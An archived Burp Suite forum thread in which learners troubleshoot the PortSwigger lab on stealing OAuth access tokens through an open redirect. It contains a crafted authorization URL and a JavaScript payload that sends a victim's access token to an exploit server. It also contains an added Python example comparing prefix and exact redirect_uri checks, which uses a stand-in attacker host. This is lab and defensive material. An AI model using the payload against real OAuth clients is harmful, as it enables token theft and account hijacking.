The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Stealing OAuth access tokens via an open redirect

TIZEE | Last updated: Jan 21, 2023 02:03PM UTC

https://0a5900c503a255e2c0a2ed1f02a7003c.web-security-academy.net/auth?client_id=bafv9dae8qp24om34rrbm&redirect_uri=https://0a0000a2035e554ec06eef8d00b00056.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ad500a503b35524c06deebc01e700fb.exploit-server.net/exploit&response_type=token&nonce=399721827&scope=openid%20profile%20email

This lab shows "client error: forbidden". Is something wrong in this lab? I've been trying for 6 hrs and still it shows like this.

Michelle, PortSwigger Agent | Last updated: Jan 23, 2023 03:27PM UTC

I've just been testing this out, and I've not come across the same issue yet. If this is still happening, can you tell us more about the steps you're taking?

Jan | Last updated: Sep 25, 2023 07:02AM UTC

I'm having 2 issues when trying to solve this lab.

1. I am not able to complete the full authentication flow of the lab because of the default CORS policy. "Access to fetch at 'https://[OAUTH-SERVER-ID]/me' from origin 'https://[LAB-SERVER-ID]' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: The 'Access-Control-Allow-Origin' header has a value 'https://fcbz.com' that is not equal to the supplied origin." This is on Chromium Version 117.0.5938.62 (Official Build) (arm64) and Firefox 117.0.1.

2. Exploit server URLs are never visited by an IP other than my own when delivering to victim, no matter what URL or headers I provide.

Michelle, PortSwigger Agent | Last updated: Sep 25, 2023 10:04AM UTC

Hi, do you have any extensions enabled? Maybe Param Miner? If so, do you see the same issues if you disable it?

nejigenius | Last updated: Jun 27, 2024 07:37AM UTC

<script>
  if (!document.location.hash) {
    window.location = 'https://oauth-0a3100f70481e50880c679a0027c0040.oauth-server.net/auth?client_id=pwfawrjz6wozrblc7kiwn&redirect_uri=https://0a4300a6044ae536804b7bbb00110027.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ac400bb0458e5e980b57a22015a00dd.exploit-server.net/exploit/&response_type=token&nonce=-1360471060&scope=openid%20profile%20email'
  } else {
    window.location = '/?' + document.location.hash.substr(1)
  }
</script>

I've been struggling with a couple of lab exercises. In one of them, I've got a payload that seems to work fine when I use the "View exploit" option. But when I try to actually deliver it by clicking "Deliver", nothing happens. I've checked the logs, and I don't see any IP addresses showing up except my own. I'm having a similar issue with another lab called "OAuth account hijacking via redirect_uri". For the past two days, I just can't get the payload to deliver to the victim's system. I've tried troubleshooting by resetting the labs, waiting for about 20-30 minutes, and then starting them up again. But so far, nothing's worked. I'm really not sure what I'm doing wrong here, and it's pretty frustrating. Any ideas on what might be causing this or how I can fix it?
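
The redirect_uri in the payloads above only gets past the authorization server because it validates the parameter by prefix, so a path that starts with the registered callback but resolves (via "../") to the client's open redirect is accepted. The following is an added example, not code from the lab or from PortSwigger, contrasting that prefix check with the exact-match check an authorization server should perform; the client id and hostnames are constructed placeholders.

```python
from urllib.parse import urlsplit, urlunsplit
import posixpath

# Constructed example data: a hypothetical client and its registered callback,
# standing in for the lab's real client_id and hostnames.
REGISTERED_REDIRECTS = {
    "client-demo": {"https://client.example/oauth-callback"},
}

# Constructed redirect_uri shaped like the one in the thread: registered prefix,
# dot-segment traversal, then the client's open redirect with a "path" parameter.
CONSTRUCTED_REDIRECT = (
    "https://client.example/oauth-callback/../post/next"
    "?path=https://attacker.example/exploit"
)


def weak_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """Prefix matching: accepts any value that merely begins with a registered URI.

    This is the class of validation that '../' plus an open redirect defeats.
    """
    return any(redirect_uri.startswith(reg)
               for reg in REGISTERED_REDIRECTS.get(client_id, ()))


def strict_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """Exact string comparison against the registered value.

    No prefix, no dot segments and no extra query string are tolerated, so the
    traversal variant is rejected before any redirect is issued.
    """
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, ())


def effective_target(redirect_uri: str) -> str:
    """Where the browser actually lands once the path's dot segments are normalised.

    Query and fragment are preserved: with response_type=token the access token is
    appended in the fragment, which the browser carries across the next redirect.
    """
    parts = urlsplit(redirect_uri)
    path = posixpath.normpath(parts.path) if parts.path else "/"
    return urlunsplit((parts.scheme, parts.netloc, path, parts.query, parts.fragment))


if __name__ == "__main__":
    print("prefix check accepts :", weak_redirect_check("client-demo", CONSTRUCTED_REDIRECT))
    print("exact check accepts  :", strict_redirect_check("client-demo", CONSTRUCTED_REDIRECT))
    print("browser resolves to  :", effective_target(CONSTRUCTED_REDIRECT))
```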

Ben, PortSwigger Agent | Last updated: Jun 27, 2024 08:00AM UTC